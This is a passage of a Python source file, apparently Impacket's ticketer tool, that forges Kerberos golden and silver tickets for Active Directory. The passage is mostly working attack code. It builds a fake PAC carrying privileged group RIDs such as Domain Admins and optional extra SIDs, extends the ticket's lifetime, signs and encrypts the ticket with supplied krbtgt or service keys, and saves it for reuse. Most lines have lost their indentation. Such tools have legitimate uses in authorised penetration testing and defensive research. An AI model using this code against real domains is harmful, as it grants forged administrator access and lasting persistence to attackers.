# as template for customization. Whatever encryption algorithms used on that ticket will be honored,
# hence you might need to specify both -nthash and -aesKey data. Ticket will be generated for 'baduser' and saved
# as baduser.ccache.
#
# ToDo:
# [X] Silver tickets still not implemented - DONE by @machosec and fixes by @br4nsh
# [ ] When -request is specified, we could ask for a user2user ticket and also populate the received PAC
#
from __future__ import division
from __future__ import print_function
import argparse
import datetime
import logging
import random
import string
import sys
from calendar import timegm
from time import strptime
from binascii import unhexlify
from pyasn1.codec.der import encoder, decoder
from pyasn1.type.univ import noValue
from impacket import version
from impacket.dcerpc.v5.dtypes import RPC_SID
from impacket.dcerpc.v5.ndr import NDRULONG
from impacket.dcerpc.v5.samr import NULL, GROUP_MEMBERSHIP, SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, \
SE_GROUP_ENABLED, USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD
from impacket.examples import logger
from impacket.krb5.asn1 import AS_REP, TGS_REP, ETYPE_INFO2, AuthorizationData, EncTicketPart, EncASRepPart, EncTGSRepPart
from impacket.krb5.constants import ApplicationTagNumbers, PreAuthenticationDataTypes, EncryptionTypes, \
PrincipalNameType, ProtocolVersionNumber, TicketFlags, encodeFlags, ChecksumTypes, AuthorizationDataType, \
KERB_NON_KERB_CKSUM_SALT
from impacket.krb5.keytab import Keytab
from impacket.krb5.crypto import Key, _enctype_table
from impacket.krb5.crypto import _checksum_table, Enctype
from impacket.krb5.pac import KERB_SID_AND_ATTRIBUTES, PAC_SIGNATURE_DATA, PAC_INFO_BUFFER, PAC_LOGON_INFO, \
PAC_CLIENT_INFO_TYPE, PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM, PACTYPE, PKERB_SID_AND_ATTRIBUTES_ARRAY, \
VALIDATION_INFO, PAC_CLIENT_INFO, KERB_VALIDATION_INFO
from impacket.krb5.types import KerberosTime, Principal
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
class TICKETER:
def __init__(self, target, password, domain, options):
self.__password = password
self.__target = target
self.__domain = domain
self.__options = options
if options.spn:
spn = options.spn.split('/')
self.__service = spn[0]
self.__server = spn[1]
if options.keytab is not None:
self.loadKeysFromKeytab(options.keytab)
# we are creating a golden ticket
else:
self.__service = 'krbtgt'
self.__server = self.__domain
@staticmethod
def getFileTime(t):
t *= 10000000
t += 116444736000000000
return t
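    # For reference: getFileTime converts a Unix epoch timestamp (seconds since
    # 1970-01-01 UTC) into a Windows FILETIME value (100-nanosecond intervals
    # since 1601-01-01 UTC). A quick sanity check of the arithmetic above:
    #   getFileTime(0) == 116444736000000000        # the Unix epoch itself
    #   getFileTime(1) - getFileTime(0) == 10**7    # one second == 10^7 ticks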
def loadKeysFromKeytab(self, filename):
keytab = Keytab.loadFile(filename)
keyblock = keytab.getKey("%s@%s" % (options.spn, self.__domain))
if keyblock:
if keyblock["keytype"] == Enctype.AES256 or keyblock["keytype"] == Enctype.AES128:
options.aesKey = keyblock.hexlifiedValue()
elif keyblock["keytype"] == Enctype.RC4:
options.nthash = keyblock.hexlifiedValue()
else:
logging.warning("No matching key for SPN '%s' in given keytab found!", options.spn)
def createBasicValidationInfo(self):
# 1) KERB_VALIDATION_INFO
kerbdata = KERB_VALIDATION_INFO()
aTime = timegm(datetime.datetime.utcnow().timetuple())
unixTime = self.getFileTime(aTime)
kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xffffffff
kerbdata['LogonTime']['dwHighDateTime'] = unixTime >> 32
# LogoffTime: A FILETIME structure that contains the time the client's logon
# session should expire. If the session should not expire, this structure
# SHOULD have the dwHighDateTime member set to 0x7FFFFFFF and the dwLowDateTime
# member set to 0xFFFFFFFF. A recipient of the PAC SHOULD<7> use this value as
# an indicator of when to warn the user that the allowed time is due to expire.
kerbdata['LogoffTime']['dwLowDateTime'] = 0xFFFFFFFF
kerbdata['LogoffTime']['dwHighDateTime'] = 0x7FFFFFFF
# KickOffTime: A FILETIME structure that contains LogoffTime minus the user
# account's forceLogoff attribute ([MS-ADA1] section 2.233) value. If the
# client should not be logged off, this structure SHOULD have the dwHighDateTime
# member set to 0x7FFFFFFF and the dwLowDateTime member set to 0xFFFFFFFF.
# The Kerberos service ticket end time is a replacement for KickOffTime.
# The service ticket lifetime SHOULD NOT be set longer than the KickOffTime of
# an account. A recipient of the PAC SHOULD<8> use this value as the indicator
# of when the client should be forcibly disconnected.
kerbdata['KickOffTime']['dwLowDateTime'] = 0xFFFFFFFF
kerbdata['KickOffTime']['dwHighDateTime'] = 0x7FFFFFFF
kerbdata['PasswordLastSet']['dwLowDateTime'] = unixTime & 0xffffffff
kerbdata['PasswordLastSet']['dwHighDateTime'] = unixTime >> 32
kerbdata['PasswordCanChange']['dwLowDateTime'] = 0
kerbdata['PasswordCanChange']['dwHighDateTime'] = 0
# PasswordMustChange: A FILETIME structure that contains the time at which
        # the client's password expires. If the password will not expire, this
# structure MUST have the dwHighDateTime member set to 0x7FFFFFFF and the
# dwLowDateTime member set to 0xFFFFFFFF.
kerbdata['PasswordMustChange']['dwLowDateTime'] = 0xFFFFFFFF
kerbdata['PasswordMustChange']['dwHighDateTime'] = 0x7FFFFFFF
kerbdata['EffectiveName'] = self.__target
kerbdata['FullName'] = ''
kerbdata['LogonScript'] = ''
kerbdata['ProfilePath'] = ''
kerbdata['HomeDirectory'] = ''
kerbdata['HomeDirectoryDrive'] = ''
kerbdata['LogonCount'] = 500
kerbdata['BadPasswordCount'] = 0
kerbdata['UserId'] = int(self.__options.user_id)
kerbdata['PrimaryGroupId'] = 513
# Our Golden Well-known groups! :)
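        # For reference, the default -groups RIDs correspond to well-known domain
        # groups: 512 Domain Admins, 513 Domain Users, 518 Schema Admins,
        # 519 Enterprise Admins, 520 Group Policy Creator Owners.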
groups = self.__options.groups.split(',')
kerbdata['GroupCount'] = len(groups)
for group in groups:
groupMembership = GROUP_MEMBERSHIP()
groupId = NDRULONG()
groupId['Data'] = int(group)
groupMembership['RelativeId'] = groupId
groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED
kerbdata['GroupIds'].append(groupMembership)
kerbdata['UserFlags'] = 0
kerbdata['UserSessionKey'] = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
kerbdata['LogonServer'] = ''
kerbdata['LogonDomainName'] = self.__domain.upper()
kerbdata['LogonDomainId'].fromCanonical(self.__options.domain_sid)
kerbdata['LMKey'] = b'\x00\x00\x00\x00\x00\x00\x00\x00'
kerbdata['UserAccountControl'] = USER_NORMAL_ACCOUNT | USER_DONT_EXPIRE_PASSWORD
kerbdata['SubAuthStatus'] = 0
kerbdata['LastSuccessfulILogon']['dwLowDateTime'] = 0
kerbdata['LastSuccessfulILogon']['dwHighDateTime'] = 0
kerbdata['LastFailedILogon']['dwLowDateTime'] = 0
kerbdata['LastFailedILogon']['dwHighDateTime'] = 0
kerbdata['FailedILogonCount'] = 0
kerbdata['Reserved3'] = 0
kerbdata['ResourceGroupDomainSid'] = NULL
kerbdata['ResourceGroupCount'] = 0
kerbdata['ResourceGroupIds'] = NULL
validationInfo = VALIDATION_INFO()
validationInfo['Data'] = kerbdata
return validationInfo
def createBasicPac(self, kdcRep):
validationInfo = self.createBasicValidationInfo()
pacInfos = {}
pacInfos[PAC_LOGON_INFO] = validationInfo.getData() + validationInfo.getDataReferents()
srvCheckSum = PAC_SIGNATURE_DATA()
privCheckSum = PAC_SIGNATURE_DATA()
if kdcRep['ticket']['enc-part']['etype'] == EncryptionTypes.rc4_hmac.value:
srvCheckSum['SignatureType'] = ChecksumTypes.hmac_md5.value
privCheckSum['SignatureType'] = ChecksumTypes.hmac_md5.value
srvCheckSum['Signature'] = b'\x00' * 16
privCheckSum['Signature'] = b'\x00' * 16
else:
srvCheckSum['Signature'] = b'\x00' * 12
privCheckSum['Signature'] = b'\x00' * 12
if len(self.__options.aesKey) == 64:
srvCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes256.value
privCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes256.value
else:
srvCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes128.value
privCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes128.value
pacInfos[PAC_SERVER_CHECKSUM] = srvCheckSum.getData()
pacInfos[PAC_PRIVSVR_CHECKSUM] = privCheckSum.getData()
clientInfo = PAC_CLIENT_INFO()
clientInfo['Name'] = self.__target.encode('utf-16le')
clientInfo['NameLength'] = len(clientInfo['Name'])
pacInfos[PAC_CLIENT_INFO_TYPE] = clientInfo.getData()
return pacInfos
def createBasicTicket(self):
if self.__options.request is True:
if self.__domain == self.__server:
logging.info('Requesting TGT to target domain to use as basis')
else:
logging.info('Requesting TGT/TGS to target domain to use as basis')
if self.__options.hashes is not None:
lmhash, nthash = self.__options.hashes.split(':')
else:
lmhash = ''
nthash = ''
userName = Principal(self.__options.user, type=PrincipalNameType.NT_PRINCIPAL.value)
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
unhexlify(lmhash), unhexlify(nthash), None,
self.__options.dc_ip)
if self.__domain == self.__server:
kdcRep = decoder.decode(tgt, asn1Spec=AS_REP())[0]
else:
serverName = Principal(self.__options.spn, type=PrincipalNameType.NT_SRV_INST.value)
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain, None, tgt, cipher,
sessionKey)
kdcRep = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
# Let's check we have all the necessary data based on the ciphers used. Boring checks
ticketCipher = int(kdcRep['ticket']['enc-part']['etype'])
encPartCipher = int(kdcRep['enc-part']['etype'])
if (ticketCipher == EncryptionTypes.rc4_hmac.value or encPartCipher == EncryptionTypes.rc4_hmac.value) and \
self.__options.nthash is None:
logging.critical('rc4_hmac is used in this ticket and you haven\'t specified the -nthash parameter. '
'Can\'t continue ( or try running again w/o the -request option)')
return None, None
if (ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value or
encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) and \
self.__options.aesKey is None:
logging.critical(
'aes128_cts_hmac_sha1_96 is used in this ticket and you haven\'t specified the -aesKey parameter. '
'Can\'t continue (or try running again w/o the -request option)')
return None, None
if (ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value or
encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) and \
self.__options.aesKey is not None and len(self.__options.aesKey) > 32:
logging.critical(
'aes128_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes128. '
'Can\'t continue (or try running again w/o the -request option)')
return None, None
if (ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value or
encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) and self.__options.aesKey is None:
logging.critical(
'aes256_cts_hmac_sha1_96 is used in this ticket and you haven\'t specified the -aesKey parameter. '
'Can\'t continue (or try running again w/o the -request option)')
return None, None
            if (ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value or
encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) and \
self.__options.aesKey is not None and len(self.__options.aesKey) < 64:
logging.critical(
'aes256_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes256. '
'Can\'t continue')
return None, None
kdcRep['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
kdcRep['cname']['name-string'] = noValue
kdcRep['cname']['name-string'][0] = self.__target
else:
logging.info('Creating basic skeleton ticket and PAC Infos')
if self.__domain == self.__server:
kdcRep = AS_REP()
kdcRep['msg-type'] = ApplicationTagNumbers.AS_REP.value
else:
kdcRep = TGS_REP()
kdcRep['msg-type'] = ApplicationTagNumbers.TGS_REP.value
kdcRep['pvno'] = 5
if self.__options.nthash is None:
kdcRep['padata'] = noValue
kdcRep['padata'][0] = noValue
kdcRep['padata'][0]['padata-type'] = PreAuthenticationDataTypes.PA_ETYPE_INFO2.value
etype2 = ETYPE_INFO2()
etype2[0] = noValue
if len(self.__options.aesKey) == 64:
etype2[0]['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value
else:
etype2[0]['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value
etype2[0]['salt'] = '%s%s' % (self.__domain.upper(), self.__target)
encodedEtype2 = encoder.encode(etype2)
kdcRep['padata'][0]['padata-value'] = encodedEtype2
kdcRep['crealm'] = self.__domain.upper()
kdcRep['cname'] = noValue
kdcRep['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
kdcRep['cname']['name-string'] = noValue
kdcRep['cname']['name-string'][0] = self.__target
kdcRep['ticket'] = noValue
kdcRep['ticket']['tkt-vno'] = ProtocolVersionNumber.pvno.value
kdcRep['ticket']['realm'] = self.__domain.upper()
kdcRep['ticket']['sname'] = noValue
kdcRep['ticket']['sname']['name-string'] = noValue
kdcRep['ticket']['sname']['name-string'][0] = self.__service
if self.__domain == self.__server:
kdcRep['ticket']['sname']['name-type'] = PrincipalNameType.NT_SRV_INST.value
kdcRep['ticket']['sname']['name-string'][1] = self.__domain.upper()
else:
kdcRep['ticket']['sname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
kdcRep['ticket']['sname']['name-string'][1] = self.__server
kdcRep['ticket']['enc-part'] = noValue
kdcRep['ticket']['enc-part']['kvno'] = 2
kdcRep['enc-part'] = noValue
if self.__options.nthash is None:
if len(self.__options.aesKey) == 64:
kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value
kdcRep['enc-part']['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value
else:
kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value
kdcRep['enc-part']['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value
else:
kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.rc4_hmac.value
kdcRep['enc-part']['etype'] = EncryptionTypes.rc4_hmac.value
kdcRep['enc-part']['kvno'] = 2
kdcRep['enc-part']['cipher'] = noValue
pacInfos = self.createBasicPac(kdcRep)
return kdcRep, pacInfos
def customizeTicket(self, kdcRep, pacInfos):
logging.info('Customizing ticket for %s/%s' % (self.__domain, self.__target))
encTicketPart = EncTicketPart()
flags = list()
flags.append(TicketFlags.forwardable.value)
flags.append(TicketFlags.proxiable.value)
flags.append(TicketFlags.renewable.value)
if self.__domain == self.__server:
flags.append(TicketFlags.initial.value)
flags.append(TicketFlags.pre_authent.value)
encTicketPart['flags'] = encodeFlags(flags)
encTicketPart['key'] = noValue
encTicketPart['key']['keytype'] = kdcRep['ticket']['enc-part']['etype']
if encTicketPart['key']['keytype'] == EncryptionTypes.aes128_cts_hmac_sha1_96.value:
encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
elif encTicketPart['key']['keytype'] == EncryptionTypes.aes256_cts_hmac_sha1_96.value:
encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(32)])
else:
encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
encTicketPart['crealm'] = self.__domain.upper()
encTicketPart['cname'] = noValue
encTicketPart['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
encTicketPart['cname']['name-string'] = noValue
encTicketPart['cname']['name-string'][0] = self.__target
encTicketPart['transited'] = noValue
encTicketPart['transited']['tr-type'] = 0
encTicketPart['transited']['contents'] = ''
encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
# Let's extend the ticket's validity a lil bit
ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(days=int(self.__options.duration))
encTicketPart['endtime'] = KerberosTime.to_asn1(ticketDuration)
encTicketPart['renew-till'] = KerberosTime.to_asn1(ticketDuration)
encTicketPart['authorization-data'] = noValue
encTicketPart['authorization-data'][0] = noValue
encTicketPart['authorization-data'][0]['ad-type'] = AuthorizationDataType.AD_IF_RELEVANT.value
encTicketPart['authorization-data'][0]['ad-data'] = noValue
# Let's locate the KERB_VALIDATION_INFO and Checksums
if PAC_LOGON_INFO in pacInfos:
data = pacInfos[PAC_LOGON_INFO]
validationInfo = VALIDATION_INFO()
validationInfo.fromString(pacInfos[PAC_LOGON_INFO])
lenVal = len(validationInfo.getData())
validationInfo.fromStringReferents(data, lenVal)
aTime = timegm(strptime(str(encTicketPart['authtime']), '%Y%m%d%H%M%SZ'))
unixTime = self.getFileTime(aTime)
kerbdata = KERB_VALIDATION_INFO()
kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xffffffff
kerbdata['LogonTime']['dwHighDateTime'] = unixTime >> 32
# Let's adjust username and other data
validationInfo['Data']['LogonDomainName'] = self.__domain.upper()
validationInfo['Data']['EffectiveName'] = self.__target
# Our Golden Well-known groups! :)
groups = self.__options.groups.split(',')
validationInfo['Data']['GroupIds'] = list()
validationInfo['Data']['GroupCount'] = len(groups)
for group in groups:
groupMembership = GROUP_MEMBERSHIP()
groupId = NDRULONG()
groupId['Data'] = int(group)
groupMembership['RelativeId'] = groupId
groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED
validationInfo['Data']['GroupIds'].append(groupMembership)
# Let's add the extraSid
if self.__options.extra_sid is not None:
extrasids = self.__options.extra_sid.split(',')
if validationInfo['Data']['SidCount'] == 0:
# Let's be sure user's flag specify we have extra sids.
validationInfo['Data']['UserFlags'] |= 0x20
validationInfo['Data']['ExtraSids'] = PKERB_SID_AND_ATTRIBUTES_ARRAY()
for extrasid in extrasids:
validationInfo['Data']['SidCount'] += 1
sidRecord = KERB_SID_AND_ATTRIBUTES()
sid = RPC_SID()
sid.fromCanonical(extrasid)
sidRecord['Sid'] = sid
sidRecord['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED
# And, let's append the magicSid
validationInfo['Data']['ExtraSids'].append(sidRecord)
else:
validationInfo['Data']['ExtraSids'] = NULL
validationInfoBlob = validationInfo.getData() + validationInfo.getDataReferents()
pacInfos[PAC_LOGON_INFO] = validationInfoBlob
if logging.getLogger().level == logging.DEBUG:
logging.debug('VALIDATION_INFO after making it gold')
validationInfo.dump()
print ('\n')
else:
raise Exception('PAC_LOGON_INFO not found! Aborting')
logging.info('\tPAC_LOGON_INFO')
# Let's now clear the checksums
if PAC_SERVER_CHECKSUM in pacInfos:
serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM])
if serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
serverChecksum['Signature'] = '\x00' * 12
elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
serverChecksum['Signature'] = '\x00' * 12
else:
serverChecksum['Signature'] = '\x00' * 16
pacInfos[PAC_SERVER_CHECKSUM] = serverChecksum.getData()
else:
raise Exception('PAC_SERVER_CHECKSUM not found! Aborting')
if PAC_PRIVSVR_CHECKSUM in pacInfos:
privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM])
privSvrChecksum['Signature'] = '\x00' * 12
if privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
privSvrChecksum['Signature'] = '\x00' * 12
elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
privSvrChecksum['Signature'] = '\x00' * 12
else:
privSvrChecksum['Signature'] = '\x00' * 16
pacInfos[PAC_PRIVSVR_CHECKSUM] = privSvrChecksum.getData()
else:
raise Exception('PAC_PRIVSVR_CHECKSUM not found! Aborting')
if PAC_CLIENT_INFO_TYPE in pacInfos:
pacClientInfo = PAC_CLIENT_INFO(pacInfos[PAC_CLIENT_INFO_TYPE])
pacClientInfo['ClientId'] = unixTime
pacInfos[PAC_CLIENT_INFO_TYPE] = pacClientInfo.getData()
else:
raise Exception('PAC_CLIENT_INFO_TYPE not found! Aborting')
logging.info('\tPAC_CLIENT_INFO_TYPE')
logging.info('\tEncTicketPart')
if self.__domain == self.__server:
encRepPart = EncASRepPart()
else:
encRepPart = EncTGSRepPart()
encRepPart['key'] = noValue
encRepPart['key']['keytype'] = encTicketPart['key']['keytype']
encRepPart['key']['keyvalue'] = encTicketPart['key']['keyvalue']
encRepPart['last-req'] = noValue
encRepPart['last-req'][0] = noValue
encRepPart['last-req'][0]['lr-type'] = 0
encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
encRepPart['nonce'] = 123456789
encRepPart['key-expiration'] = KerberosTime.to_asn1(ticketDuration)
encRepPart['flags'] = encodeFlags(flags)
encRepPart['authtime'] = str(encTicketPart['authtime'])
encRepPart['endtime'] = str(encTicketPart['endtime'])
encRepPart['starttime'] = str(encTicketPart['starttime'])
encRepPart['renew-till'] = str(encTicketPart['renew-till'])
encRepPart['srealm'] = self.__domain.upper()
encRepPart['sname'] = noValue
encRepPart['sname']['name-string'] = noValue
encRepPart['sname']['name-string'][0] = self.__service
if self.__domain == self.__server:
encRepPart['sname']['name-type'] = PrincipalNameType.NT_SRV_INST.value
encRepPart['sname']['name-string'][1] = self.__domain.upper()
logging.info('\tEncAsRepPart')
else:
encRepPart['sname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
encRepPart['sname']['name-string'][1] = self.__server
logging.info('\tEncTGSRepPart')
return encRepPart, encTicketPart, pacInfos
def signEncryptTicket(self, kdcRep, encASorTGSRepPart, encTicketPart, pacInfos):
logging.info('Signing/Encrypting final ticket')
# We changed everything we needed to make us special. Now let's repack and calculate checksums
validationInfoBlob = pacInfos[PAC_LOGON_INFO]
validationInfoAlignment = b'\x00' * (((len(validationInfoBlob) + 7) // 8 * 8) - len(validationInfoBlob))
pacClientInfoBlob = pacInfos[PAC_CLIENT_INFO_TYPE]
pacClientInfoAlignment = b'\x00' * (((len(pacClientInfoBlob) + 7) // 8 * 8) - len(pacClientInfoBlob))
serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM])
serverChecksumBlob = pacInfos[PAC_SERVER_CHECKSUM]
serverChecksumAlignment = b'\x00' * (((len(serverChecksumBlob) + 7) // 8 * 8) - len(serverChecksumBlob))
privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM])
privSvrChecksumBlob = pacInfos[PAC_PRIVSVR_CHECKSUM]
privSvrChecksumAlignment = b'\x00' * (((len(privSvrChecksumBlob) + 7) // 8 * 8) - len(privSvrChecksumBlob))
        # The offsets are set from the beginning of the PAC_TYPE
# [MS-PAC] 2.4 PAC_INFO_BUFFER
offsetData = 8 + len(PAC_INFO_BUFFER().getData()) * 4
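        # Each PAC_INFO_BUFFER descriptor is 16 bytes (ULONG ulType, ULONG
        # cbBufferSize, ULONG64 Offset), so with the 8-byte PACTYPE header and the
        # 4 buffers used here this offset should work out to 8 + 4*16 = 72.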
# Let's build the PAC_INFO_BUFFER for each one of the elements
validationInfoIB = PAC_INFO_BUFFER()
validationInfoIB['ulType'] = PAC_LOGON_INFO
validationInfoIB['cbBufferSize'] = len(validationInfoBlob)
validationInfoIB['Offset'] = offsetData
offsetData = (offsetData + validationInfoIB['cbBufferSize'] + 7) // 8 * 8
pacClientInfoIB = PAC_INFO_BUFFER()
pacClientInfoIB['ulType'] = PAC_CLIENT_INFO_TYPE
pacClientInfoIB['cbBufferSize'] = len(pacClientInfoBlob)
pacClientInfoIB['Offset'] = offsetData
offsetData = (offsetData + pacClientInfoIB['cbBufferSize'] + 7) // 8 * 8
serverChecksumIB = PAC_INFO_BUFFER()
serverChecksumIB['ulType'] = PAC_SERVER_CHECKSUM
serverChecksumIB['cbBufferSize'] = len(serverChecksumBlob)
serverChecksumIB['Offset'] = offsetData
offsetData = (offsetData + serverChecksumIB['cbBufferSize'] + 7) // 8 * 8
privSvrChecksumIB = PAC_INFO_BUFFER()
privSvrChecksumIB['ulType'] = PAC_PRIVSVR_CHECKSUM
privSvrChecksumIB['cbBufferSize'] = len(privSvrChecksumBlob)
privSvrChecksumIB['Offset'] = offsetData
# offsetData = (offsetData+privSvrChecksumIB['cbBufferSize'] + 7) //8 *8
# Building the PAC_TYPE as specified in [MS-PAC]
buffers = validationInfoIB.getData() + pacClientInfoIB.getData() + serverChecksumIB.getData() + \
privSvrChecksumIB.getData() + validationInfoBlob + validationInfoAlignment + \
pacInfos[PAC_CLIENT_INFO_TYPE] + pacClientInfoAlignment
buffersTail = serverChecksumBlob + serverChecksumAlignment + privSvrChecksum.getData() + privSvrChecksumAlignment
pacType = PACTYPE()
pacType['cBuffers'] = 4
pacType['Version'] = 0
pacType['Buffers'] = buffers + buffersTail
blobToChecksum = pacType.getData()
checkSumFunctionServer = _checksum_table[serverChecksum['SignatureType']]
if serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
keyServer = Key(Enctype.AES256, unhexlify(self.__options.aesKey))
elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
keyServer = Key(Enctype.AES128, unhexlify(self.__options.aesKey))
elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_md5.value:
keyServer = Key(Enctype.RC4, unhexlify(self.__options.nthash))
else:
raise Exception('Invalid Server checksum type 0x%x' % serverChecksum['SignatureType'])
checkSumFunctionPriv = _checksum_table[privSvrChecksum['SignatureType']]
if privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
keyPriv = Key(Enctype.AES256, unhexlify(self.__options.aesKey))
elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
keyPriv = Key(Enctype.AES128, unhexlify(self.__options.aesKey))
elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_md5.value:
keyPriv = Key(Enctype.RC4, unhexlify(self.__options.nthash))
else:
raise Exception('Invalid Priv checksum type 0x%x' % serverChecksum['SignatureType'])
serverChecksum['Signature'] = checkSumFunctionServer.checksum(keyServer, KERB_NON_KERB_CKSUM_SALT, blobToChecksum)
logging.info('\tPAC_SERVER_CHECKSUM')
privSvrChecksum['Signature'] = checkSumFunctionPriv.checksum(keyPriv, KERB_NON_KERB_CKSUM_SALT, serverChecksum['Signature'])
logging.info('\tPAC_PRIVSVR_CHECKSUM')
buffersTail = serverChecksum.getData() + serverChecksumAlignment + privSvrChecksum.getData() + privSvrChecksumAlignment
pacType['Buffers'] = buffers + buffersTail
authorizationData = AuthorizationData()
authorizationData[0] = noValue
authorizationData[0]['ad-type'] = AuthorizationDataType.AD_WIN2K_PAC.value
authorizationData[0]['ad-data'] = pacType.getData()
authorizationData = encoder.encode(authorizationData)
encTicketPart['authorization-data'][0]['ad-data'] = authorizationData
if logging.getLogger().level == logging.DEBUG:
logging.debug('Customized EncTicketPart')
print(encTicketPart.prettyPrint())
print ('\n')
encodedEncTicketPart = encoder.encode(encTicketPart)
cipher = _enctype_table[kdcRep['ticket']['enc-part']['etype']]
if cipher.enctype == EncryptionTypes.aes256_cts_hmac_sha1_96.value:
key = Key(cipher.enctype, unhexlify(self.__options.aesKey))
elif cipher.enctype == EncryptionTypes.aes128_cts_hmac_sha1_96.value:
key = Key(cipher.enctype, unhexlify(self.__options.aesKey))
elif cipher.enctype == EncryptionTypes.rc4_hmac.value:
key = Key(cipher.enctype, unhexlify(self.__options.nthash))
else:
raise Exception('Unsupported enctype 0x%x' % cipher.enctype)
# Key Usage 2
# AS-REP Ticket and TGS-REP Ticket (includes TGS session
# key or application session key), encrypted with the
# service key (Section 5.3)
logging.info('\tEncTicketPart')
cipherText = cipher.encrypt(key, 2, encodedEncTicketPart, None)
kdcRep['ticket']['enc-part']['cipher'] = cipherText
kdcRep['ticket']['enc-part']['kvno'] = 2
# Lastly.. we have to encrypt the kdcRep['enc-part'] part
# with a key we chose. It actually doesn't really matter since nobody uses it (could it be trash?)
encodedEncASRepPart = encoder.encode(encASorTGSRepPart)
if self.__domain == self.__server:
# Key Usage 3
# AS-REP encrypted part (includes TGS session key or
# application session key), encrypted with the client key
# (Section 5.4.2)
sessionKey = Key(cipher.enctype, encASorTGSRepPart['key']['keyvalue'].asOctets())
logging.info('\tEncASRepPart')
cipherText = cipher.encrypt(sessionKey, 3, encodedEncASRepPart, None)
else:
# Key Usage 8
# TGS-REP encrypted part (includes application session
# key), encrypted with the TGS session key
# (Section 5.4.2)
sessionKey = Key(cipher.enctype, encASorTGSRepPart['key']['keyvalue'].asOctets())
logging.info('\tEncTGSRepPart')
cipherText = cipher.encrypt(sessionKey, 8, encodedEncASRepPart, None)
kdcRep['enc-part']['cipher'] = cipherText
kdcRep['enc-part']['etype'] = cipher.enctype
kdcRep['enc-part']['kvno'] = 1
if logging.getLogger().level == logging.DEBUG:
logging.debug('Final Golden Ticket')
print(kdcRep.prettyPrint())
print ('\n')
return encoder.encode(kdcRep), cipher, sessionKey
def saveTicket(self, ticket, sessionKey):
logging.info('Saving ticket in %s' % (self.__target.replace('/', '.') + '.ccache'))
from impacket.krb5.ccache import CCache
ccache = CCache()
if self.__server == self.__domain:
ccache.fromTGT(ticket, sessionKey, sessionKey)
else:
ccache.fromTGS(ticket, sessionKey, sessionKey)
ccache.saveFile(self.__target.replace('/','.') + '.ccache')
def run(self):
ticket, adIfRelevant = self.createBasicTicket()
if ticket is not None:
encASorTGSRepPart, encTicketPart, pacInfos = self.customizeTicket(ticket, adIfRelevant)
